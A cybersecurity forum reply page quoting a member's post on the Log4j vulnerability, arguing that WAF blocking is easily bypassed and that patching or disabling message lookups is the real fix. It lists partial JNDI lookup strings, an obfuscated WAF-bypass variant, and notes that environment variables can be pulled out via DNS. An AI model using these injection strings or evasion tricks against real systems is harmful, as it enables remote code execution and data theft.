Log in
Register
Cyber Forum
More options
Toggle width
Share this page
Share this page
Share
Share
Cyber Forum
Log in
Register
More options
Toggle width
Share this page
Share this page
Share
Share
Menu
Install the app
Install
Home
CyberWeekly Podcast
Breaking News! Podcast
Cyber Risk Rating
Forums
New posts
Forum list
Trending
Leaderboards
News Feeds
Resources
Latest reviews
Sophos X-Ops Intelix
Threat Reports
Members
Current visitors
My.CompTIA
Help Documents
Preference Center
Forums
Security
Active Exploits Discussion/Recommendations
Log4j Vulnerability Information
JavaScript is disabled. For a better experience, please enable JavaScript in your browser before proceeding.
You are using an out of date browser. It may not display this or other websites correctly.
You should upgrade or use an
alternative browser
.
Reply to thread
Message
<blockquote data-quote="Jason Slagle" data-source="post: 2452" data-attributes="member: 348"><p>Except that pretty much everyone is not running the LDAP server on 636 - it's almost always on a non-privileged port.</p><p></p><p>There are tons of "potential" ways to mitigate this without upgrading - some are covered above. But some of the things in that graphic (Like block with WAF) are really hard because of the number of OTHER msg lookup directives I can use. On you block ${jndi:ldap://} Do you ALSO block ${jndi:rmi://} ? I'm fairly certain I can exploit via RMI (I should test this and confirm - and research indicates it's config dependent). What about ${${lower:j}ndi:ldap//} etc. WAF bypass is fairly trivial.</p><p></p><p>Same with remote codebases - yeah you block the RCE, but I can suck arbitrary environment variables out via DNS. Guess what uses ENV variables a lot to pass in data - some potentially valuable - Spring boot in a container. I can look up your underlying os and java version.</p><p></p><p>Basically other than patching/disable log4j or disabling message lookups/jndi you have SOME vulnerability, and in a lot of code bases just turning off msg lookups makes logging break in some cases because there are legit use cases.</p></blockquote><p></p>
[QUOTE="Jason Slagle, post: 2452, member: 348"] Except that pretty much everyone is not running the LDAP server on 636 - it's almost always on a non-privileged port. There are tons of "potential" ways to mitigate this without upgrading - some are covered above. But some of the things in that graphic (Like block with WAF) are really hard because of the number of OTHER msg lookup directives I can use. On you block ${jndi:ldap://} Do you ALSO block ${jndi:rmi://} ? I'm fairly certain I can exploit via RMI (I should test this and confirm - and research indicates it's config dependent). What about ${${lower:j}ndi:ldap//} etc. WAF bypass is fairly trivial. Same with remote codebases - yeah you block the RCE, but I can suck arbitrary environment variables out via DNS. Guess what uses ENV variables a lot to pass in data - some potentially valuable - Spring boot in a container. I can look up your underlying os and java version. Basically other than patching/disable log4j or disabling message lookups/jndi you have SOME vulnerability, and in a lot of code bases just turning off msg lookups makes logging break in some cases because there are legit use cases. [/QUOTE]
Name
Verification
Post reply
Forums
Security
Active Exploits Discussion/Recommendations
Log4j Vulnerability Information
Top
Bottom
Home
Forums
Threat Reports
My.CompTIA
Menu